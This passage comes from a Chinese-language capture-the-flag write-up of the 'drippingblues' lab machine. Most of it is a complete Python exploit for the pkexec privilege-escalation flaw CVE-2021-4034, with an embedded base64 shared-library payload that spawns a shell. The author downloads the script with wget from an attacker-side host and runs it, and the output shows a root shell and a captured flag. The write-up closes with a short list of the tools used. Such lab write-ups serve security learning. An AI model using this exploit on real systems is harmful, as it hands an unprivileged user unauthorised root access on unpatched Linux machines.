AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''
payload = base64.b64decode(payload_b64)
# Set the environment for the call to execve()
environ = [
b'exploit',
b'PATH=GCONV_PATH=.',
b'LC_MESSAGES=en_US.UTF-8',
b'XAUTHORITY=../LOL',
None
]
# Find the C library to call execve() directly, as Python helpfully doesn't
# allow us to call execve() with no arguments.
try:
libc = CDLL(find_library('c'))
except:
print('[!] Unable to find the C library, wtf?')
sys.exit()
# Create the shared library from the payload
print('[+] Creating shared library for exploit code.')
try:
with open('payload.so', 'wb') as f:
f.write(payload)
except:
print('[!] Failed creating payload.so.')
sys.exit()
os.chmod('payload.so', 0o0755)
# make the GCONV_PATH directory
try:
os.mkdir('GCONV_PATH=.')
except FileExistsError:
print('[-] GCONV_PATH=. directory already exists, continuing.')
except:
print('[!] Failed making GCONV_PATH=. directory.')
sys.exit()
# Create a temp exploit file
try:
with open('GCONV_PATH=./exploit', 'wb') as f:
f.write(b'')
except:
print('[!] Failed creating exploit file')
sys.exit()
os.chmod('GCONV_PATH=./exploit', 0o0755)
# Create directory to hold gconf-modules configuration file
try:
os.mkdir('exploit')
except FileExistsError:
print('[-] exploit directory already exists, continuing.')
except:
print('[!] Failed making exploit directory.')
sys.exit()
# Create gconf config file
try:
with open('exploit/gconv-modules', 'wb') as f:
f.write(b'module UTF-8// INTERNAL ../payload 2\n');
except:
print('[!] Failed to create gconf-modules config file.')
sys.exit()
# Convert the environment to an array of char*
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ
print('[+] Calling execve()')
# Call execve() with NULL arguments
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)
执行后成功提权
thugger@drippingblues:~$ wget http://192.168.11.130:8888/CVE-2021-4034.py
--2024-04-03 07:07:43-- http://192.168.11.130:8888/CVE-2021-4034.py
Connecting to 192.168.11.130:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3,2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’
CVE-2021-4034.py 100%[==============================================================>] 3,19K --.-KB/s in 0s
2024-04-03 07:07:43 (304 MB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]
thugger@drippingblues:~$ python CVE-2021-4034.py
Command 'python' not found, did you mean:
command 'python3' from deb python3
command 'python' from deb python-is-python3
thugger@drippingblues:~$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
root
# pwd
/home/thugger
# id
uid=0(root) gid=1001(thugger) groups=1001(thugger)
# cd /root
# ls
root.txt
# cat root
cat: root: No such file or directory
# cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8#
成功拿到flag2
这里看了其他人的wp,发现是利用的CVE-2021-3560这个漏洞,我这边跑linpeas没有发现这个
回头看看secret.zip没有解出来,利用此前出现过的用户名、md5值都试了都不对,可能就是需要爆破吧
三、总结
这个靶机又一次利用了文件包含漏洞,这里在没有特别明显的提示的时候,通常可以利用fuzz工具做模糊测试,来寻找文件包含的parameters
- FTP匿名访问
fcrackzip的使用- 文件包含漏洞
wfuzz的利用suid3num.py与linpeas的使用
